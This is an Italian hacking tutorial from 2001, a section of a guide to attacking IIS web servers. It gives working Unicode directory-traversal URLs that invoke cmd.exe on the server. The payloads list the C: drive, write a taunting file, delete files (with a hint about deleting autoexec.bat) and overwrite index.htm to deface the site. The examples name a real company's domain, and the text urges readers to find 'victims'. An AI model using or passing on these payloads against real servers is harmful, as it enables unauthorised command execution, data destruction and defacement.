Agosto-2001

            
                            .:La Grande Guida AllHacking Di IIS:.            
                                                                                
                                       [realizzata da]                          
                       ___                                                      
                      /     __   __  |/  |__   __   __  |/   ___   __           
                      \___ (__) (__) |\ |__) (__) (__) |\ (__/_ |  '          
                                                                                
                                                                                
                                            ___                                 
                                           (__/_                                
                                                                                
                     _                                                          
                    |_  ___  |   _|_   __   __    __  __   __   __              
                    |  (__/_ |_,  |_, (__) |  ) __)  |__) |  ' (__( (__|        
                                                     |                _|        
            


2.7 Hacking avanzato

Adesso  il momento di fare qualcosa di pi raffinato e professionale, ora saremo
noi a trovare qualche bug e sfruttarlo. le directory dove possono risiedere bug 
solitamente sono:

/scripts - /cgi-bin - /wwwroot - /_vti_bin - /IISADMPWD - /msadc

Adesso l'exploit che useremo sar html, quindi codici da aggiungere nel normale indirizzo
URL e vedere se il bug si trova in una delle cartelle esempio:

http://www.microsoft.com/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir\c%20c:\

In questa stringa andiamo a richiamare nella cartella /cgi-bin una chiamata verso il cmd.exe che si trova in /winnt/system32 e gli 
imponiamo di eseguire un dir, se tutto va a buon fine nell'output del browser vi arriva il contenuto del drive "C".
Se invece non otteniete niente cambiate cartella al posto di mettere /cgi-bin/ ne mettete una di quelle sopra citate.
Fate molta attenzione a ci che bucate, ovviamente se un server non gira con IIS ma con APACHE cambiate vittima :) oppure provate a cercare qualche exploit per il web server (credo che continueremo a fare altre guide per l'hacking di linux).

Spieghiamo bene perch ho chiamato Hacking Avanzato questo capitolo, qui non  un semplice exploit da usare ma una vera e propia ricerca dentro le varie cartelle del server per trovare un bug, il lavoro qui sar pi lungo perch qui siete voi a cercare e sfruttare il bug.

Adesso spiego anche come fare per creare file o defacciare:

Per creare file basta scrivere:

http://www.microsoft.com/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20echo%20FELTONSPRAY+TI+HA+BUCATO+IL+SERVER+ZIO+BILL+AUAUAAHHA>%20billFuck.txt

ehehe e magicamente si crea il file contenente cio che volete :)

Adesso un comando un po lamah :-)

http://www.microsoft.com/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20del%20c:\billFuck.txt

se al posto di mettere il nome del testo sopra creato mettiamo l'autoexec.bat che succede? :-) uahahahah
Fatene buon uso di questo comando evitate di cancellare file...

Adesso se volete defacciare la index, scrivete:

http://www.microsoft.com/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20echo%20FELTONSPRAY+TI+HA+BUCATO+IL+SERVER+ZIO+BILL+AUAUAAHHA>%20c:\inetpub\wwwroot\index.htm

ricordate di fare attenzione alla web root senn defacciate qualche altra pagina :-)


                           _________________________________________
                          [                                         ]
                          [            Copyright (C) 2001           ]
                          [                                         ]
                          [ FeltonSpray  - feltonspray@katamail.com ]
                          [                                         ]
                          [   Cookbooker - cookbooker@libero.it     ]
                          [                                         ]
                            